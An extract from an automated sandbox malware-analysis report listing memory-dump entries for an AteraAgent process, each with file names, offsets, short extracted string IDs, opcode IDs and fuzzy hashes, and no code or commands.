                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$J9E$plO
                                                                                                                                                                                                                                          • API String ID: 0-3249010378
                                                                                                                                                                                                                                          • Opcode ID: fbf855037956f5d4fc3f546dccc3f339d7b8989ed6c37c9a65575c0b96739280
                                                                                                                                                                                                                                          • Instruction ID: 7912a0b40082a4f52ed51b57b83ddff560403e36fe0cf6a015c189950299cc7a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fbf855037956f5d4fc3f546dccc3f339d7b8989ed6c37c9a65575c0b96739280
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4E15C71A1CA4A8FE759EB6C84555797BE1EF9A380F0041BEE04EC72E3DD24EC468781
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0DO$0DO$`mO
                                                                                                                                                                                                                                          • API String ID: 0-799729319
                                                                                                                                                                                                                                          • Opcode ID: b0e8b75ec1212dcde85ccb4fd285f3b0855ce2c6701f173662280d6f46e695d2
                                                                                                                                                                                                                                          • Instruction ID: f4e6af4b2bc89fd994c6c4fc1fd2bdcfe16d11a238ea6a045e54eccf0211b480
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0e8b75ec1212dcde85ccb4fd285f3b0855ce2c6701f173662280d6f46e695d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 27D1C07190AA4E8FEB94DF68C4556BA77F1FF5A380F5040BAD00DD72A2CA385945DB80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (3N$XH$XH
                                                                                                                                                                                                                                          • API String ID: 0-10795795
                                                                                                                                                                                                                                          • Opcode ID: 40d9e947b68ea1d62eb79a9d45c42a1062c0904b8af4c936aa4dc25f35baa4cc
                                                                                                                                                                                                                                          • Instruction ID: 323e431f4e0f60dbd1688d2e3277e98edc2498fc58d2f4093bda3f0bfae9b686
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 40d9e947b68ea1d62eb79a9d45c42a1062c0904b8af4c936aa4dc25f35baa4cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B6D1A3A1908A8D4FEB95EB78C8556AA7BF1FF66380F4100F6D40DCB2A3DE245D46CB10
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: _$b4E$p[G
                                                                                                                                                                                                                                          • API String ID: 0-2099924344
                                                                                                                                                                                                                                          • Opcode ID: 642e21937401524bb1a8b3a5fb53bcacaa7c248e4bef9c3156ec53a2d168cb8b
                                                                                                                                                                                                                                          • Instruction ID: 0aa1cbb1d0abad61f2312c737ea43669ff7c8b4a5b4c5e059bb501826c9b52da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 642e21937401524bb1a8b3a5fb53bcacaa7c248e4bef9c3156ec53a2d168cb8b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36B14D70D0961ACFEB68DF58C855BACB7B5FF59340F0045A9D00EE7292DA366985CF80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: _$b4E$p[G
                                                                                                                                                                                                                                          • API String ID: 0-2099924344
                                                                                                                                                                                                                                          • Opcode ID: 49d3ab2aaf118733ae173734243bb8e675e8c9edbc4110cfad9eb7e83a21217d
                                                                                                                                                                                                                                          • Instruction ID: 6c77c57928aff1cc5e73be49443f63f4feec80db6968026be388c77f7a893dcb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 49d3ab2aaf118733ae173734243bb8e675e8c9edbc4110cfad9eb7e83a21217d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C813B70D096198FEB68DB58C855BECB7F5FF59340F0041A9D10EE72A2DA35AA85CF80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$`oO
                                                                                                                                                                                                                                          • API String ID: 0-1130944104
                                                                                                                                                                                                                                          • Opcode ID: 72292abefa458457fab2f3ae5ee49160f5458a49ca85f6ef593ca124da462fec
                                                                                                                                                                                                                                          • Instruction ID: aef6354ddfe84c44d22c13ae3daf7a9c430c2cd20f14974fd34fa197b77510aa
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 72292abefa458457fab2f3ae5ee49160f5458a49ca85f6ef593ca124da462fec
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD529430A19A4ECFDF94DF1CC454AA977E2FF5A344F54427AD40ED72A2CA24E845CB81
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /E$/E
                                                                                                                                                                                                                                          • API String ID: 0-1195910066
                                                                                                                                                                                                                                          • Opcode ID: 4bff57dd0187cad6e0739a300ba4554a720f06b5cee3e2fcb48dbd290b422fd8
                                                                                                                                                                                                                                          • Instruction ID: 4f8a9662c2eabbda9acb29ba065d85abdfbd0a78e28555faa35b398d1d99d3dc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4bff57dd0187cad6e0739a300ba4554a720f06b5cee3e2fcb48dbd290b422fd8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G$p[G
                                                                                                                                                                                                                                          • API String ID: 0-1094101947
                                                                                                                                                                                                                                          • Opcode ID: 6f3853f78d07895941467f4b4577f069e54324118f9a1b136ebb79de04ed1557
                                                                                                                                                                                                                                          • Instruction ID: f48049ca7d7fd93d13454dc34170a85a70361c8bf834b87ad6fe8727badc8910
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6f3853f78d07895941467f4b4577f069e54324118f9a1b136ebb79de04ed1557
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 05B10531D0964A8FE7A8DBA8C8457F87BF5EF46350F0441BAD04ED71A2CE38194ACB90
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: J9E$plO
                                                                                                                                                                                                                                          • API String ID: 0-377826821
                                                                                                                                                                                                                                          • Opcode ID: 01a73fd839d36f389dccdc44412a396720a960be67f80258def0d50565fe4535
                                                                                                                                                                                                                                          • Instruction ID: 819864037eeef07a86ea4d17ccba778fadcf9c7b9d0772a42c2cc428750e2b34
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 01a73fd839d36f389dccdc44412a396720a960be67f80258def0d50565fe4535
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F914C61A1CB868FE749DB6C984597537E5EFA6780F0041BEE08EC72E3DD14EC468782
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 6E$b4E
                                                                                                                                                                                                                                          • API String ID: 0-1936144184
                                                                                                                                                                                                                                          • Opcode ID: 4ef14536ae376dea36eeeb21f3319fe035b0d8bd30b7476eee87a54c2a48eb15
                                                                                                                                                                                                                                          • Instruction ID: 4ed2c20cf7c435c4fdf61e2ecbc9e0e4f40d66382d74b18fa84228860acbd091
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ef14536ae376dea36eeeb21f3319fe035b0d8bd30b7476eee87a54c2a48eb15
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A816962B0DA4A4FE758976CA4561B937D9EB9A390F0441BFD04EC32E3ED16A80B43C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: b4E$b4E
                                                                                                                                                                                                                                          • API String ID: 0-3606647801
                                                                                                                                                                                                                                          • Opcode ID: c6c718622d044986d9ae1f030e4f4c27a0cd7fbf9a5893aaf0a35911d1b2f23e
                                                                                                                                                                                                                                          • Instruction ID: c0c6224de4a9f80d53298fde5703061884dfdc64def59eeed67afa30b84ae006
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c6c718622d044986d9ae1f030e4f4c27a0cd7fbf9a5893aaf0a35911d1b2f23e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F916371A18B4A8FD768DB28C4819A677E5FF52350B14867ED08FC31A7DE25F8468BC0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: /W_H$8hG
                                                                                                                                                                                                                                          • API String ID: 0-1405751336
                                                                                                                                                                                                                                          • Opcode ID: a0714717fe0ece79ab85cb639f28812f2e71e922bafd06320c9406e774a9bd0b
                                                                                                                                                                                                                                          • Instruction ID: bf05ac0afba71f38d5e294725216a97acb863b6938241da9e333e5a96646c2d2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a0714717fe0ece79ab85cb639f28812f2e71e922bafd06320c9406e774a9bd0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01A1747191964E8FE798EBA8D8956FC77B5FF99340F0005FAD00ED21A2DF3459868B80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: }G$r6E
                                                                                                                                                                                                                                          • API String ID: 0-3561845606
                                                                                                                                                                                                                                          • Opcode ID: 8b364e914821058d8ab97170da55efdda0c0d137e8e360d6214f60ef608b62b4
                                                                                                                                                                                                                                          • Instruction ID: f3d8863edd5bac56b96ef517786266eb06853366ca80aa1a4632cc4e62f9ecc8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b364e914821058d8ab97170da55efdda0c0d137e8e360d6214f60ef608b62b4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36517D71919A1E8FEBB8DB68D8953E877B5FF59340F4041BAD00ED3292CE355D468B80
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: X`O$vL_^
                                                                                                                                                                                                                                          • API String ID: 0-3628153963
                                                                                                                                                                                                                                          • Opcode ID: 227cd22d730c45b48bdc425acc97308e9897b7d98092c1814b0e6b8a25033b77
                                                                                                                                                                                                                                          • Instruction ID: 4ba2b72a360d11fc817a50f72f4e4a1b2cdacfca53efdb38deaf59a4ab02d09a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 227cd22d730c45b48bdc425acc97308e9897b7d98092c1814b0e6b8a25033b77
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC413772B1DA498FE759DB6C985A5B93BE1EF9B350B0440BBE04EC72A3CD105C0687C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HkH
                                                                                                                                                                                                                                          • API String ID: 0-2048587430
                                                                                                                                                                                                                                          • Opcode ID: c0ed586fac6acb3a1bf6fdd1d0c4b672657783ecb9d5e9b69bc4c1005ca9cd7a
                                                                                                                                                                                                                                          • Instruction ID: d521b42bf61a5237d41a004b7ded08b181e9b889dfded5ccbe8d15d72a46cd52
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0ed586fac6acb3a1bf6fdd1d0c4b672657783ecb9d5e9b69bc4c1005ca9cd7a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6BE1D870A1CB4A8FE794EB28C44567AB7D1FF95340F50857EE44EC72A3DE34A8458B82
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: cd0baef1094badceecb7d571b94391628c38192ee50ac563c65b046147ae1be4
                                                                                                                                                                                                                                          • Instruction ID: 1f574930babf9cf27b93fda1f02af200fd23fd6d8898c23ffc7d00af8c2fd850
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cd0baef1094badceecb7d571b94391628c38192ee50ac563c65b046147ae1be4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCE1EF70A19B8A8FE768DB58C44067977E5EF96340F1485BAD04EC32A7CA26EC4687C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HkH
                                                                                                                                                                                                                                          • API String ID: 0-2048587430
                                                                                                                                                                                                                                          • Opcode ID: 1aeb5bcc9b8d9974cf3f0518011917bbc83abb0b0bb73b6b0978e498af96399c
                                                                                                                                                                                                                                          • Instruction ID: 24aa1e426c39de57d8de07dbb0e144519b9082e9066210352cc22485991f4073
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1aeb5bcc9b8d9974cf3f0518011917bbc83abb0b0bb73b6b0978e498af96399c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 62E1F970A1CB4A8FD794EF28C45566A77D2FF95340F10857ED44EC72A3DE34A8458B82
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0XO
                                                                                                                                                                                                                                          • API String ID: 0-3187520475
                                                                                                                                                                                                                                          • Opcode ID: 376bb9e88738c5cb2eef1609a02640adde3311a307f21dcc571bc3d1512d8dcd
                                                                                                                                                                                                                                          • Instruction ID: d2ec1fc4f3d55f60ebd1202cc2b4639cd0988f939159b903d3f0da14668ed643
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 376bb9e88738c5cb2eef1609a02640adde3311a307f21dcc571bc3d1512d8dcd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AD15B71A1DA4A8FEB98EB2CC45AA7837D5EF56340B0441BED44EC71A3DD24EC4687C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 36a263e9e0a6d3190ca2c7d0009a084122f671b412460903e8380156ae03da72
                                                                                                                                                                                                                                          • Instruction ID: 86f529187f9db26ecf75f49a2bb6ac3f0667606b8d11d4a26f8343da8a1048ff
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 36a263e9e0a6d3190ca2c7d0009a084122f671b412460903e8380156ae03da72
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DC14530A1DB468FE759DB58C44197577E5EF96390B1889BDD08EC31A3CA25F8078BC1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: 0-O
                                                                                                                                                                                                                                          • API String ID: 0-4022802784
                                                                                                                                                                                                                                          • Opcode ID: 5658bb662a0a9d9811f0ad33a94aad885e5c7249defa99425a05bd53d376d687
                                                                                                                                                                                                                                          • Instruction ID: 79bb22f1924a550d37d86863e96b916b2e521940b96a20be5fa231dc783a68f0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5658bb662a0a9d9811f0ad33a94aad885e5c7249defa99425a05bd53d376d687
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B10961B1DA4A8FEB98EB2C945567837D2EF99390B4441BFE40EC72E7DD18AC064381
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: HQ_L
                                                                                                                                                                                                                                          • API String ID: 0-1356048233
                                                                                                                                                                                                                                          • Opcode ID: 397bb17fa124fad5f539ca50e3d641d6f3b313075c19c40d81c39e3648a3991e
                                                                                                                                                                                                                                          • Instruction ID: 3aabaefb7b49dc0b66ce6ed7148b76a99f93836913ecc1a650ee054cbdf9b4ab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 397bb17fa124fad5f539ca50e3d641d6f3b313075c19c40d81c39e3648a3991e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06C11770A0DB4A8FDB54EF28D8559B97BE5EF9A340B00417EE40EC72A3DE24E80587C1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: 10281fba5be5e2e168ce7041449a1fa19bab308643f21d5beb520f16d3076bf3
                                                                                                                                                                                                                                          • Instruction ID: c44dce135760cddd898cfef81439001133c4373ce03728354f4cc970ba98a7a3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 10281fba5be5e2e168ce7041449a1fa19bab308643f21d5beb520f16d3076bf3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AC1CD70618B4A8FD768DB18D441539B3E5EB9A340B148A7DD08FC36A6DA26FC468BC1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: d
                                                                                                                                                                                                                                          • API String ID: 0-2564639436
                                                                                                                                                                                                                                          • Opcode ID: ef2aff7fdeb75151d79438862b35a8834668d37b3d0668674d4b4385411009cc
                                                                                                                                                                                                                                          • Instruction ID: 40aafa68b026cac8e28398e68de3a64667c913b45a05a5063c7435ffd4af489b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef2aff7fdeb75151d79438862b35a8834668d37b3d0668674d4b4385411009cc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E0B10071A1CB468FD768EB58D4415B573E5EF9A354B1486BDD08FC32A3CA22AC438BC1
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
Memory Dump Source
• Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: 7c0c2b0683ad1a42f2f77a9b910ce00089fe99dae942d71430ca8738503744a1
                                                                                                                                                                                                                                          • Instruction ID: 0ab6732752063c94e6e91b8d309edc69cb3fb2d1ff93fc1babf959a5a0147063
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c0c2b0683ad1a42f2f77a9b910ce00089fe99dae942d71430ca8738503744a1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D25124B1C096898FDB59DBA4C8526FA7BF4EF56380F0440BBD00DDB2E2CA281946C790
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: p[G
                                                                                                                                                                                                                                          • API String ID: 0-3967213495
                                                                                                                                                                                                                                          • Opcode ID: 052768c31e85b4b936177c4c543bf236457f75310bd2b494e96e0c62513f0d6d
                                                                                                                                                                                                                                          • Instruction ID: c2eefb50c1624ac45701fb71a2ecf5540cdc4a940e98877a898bd8066b9609be
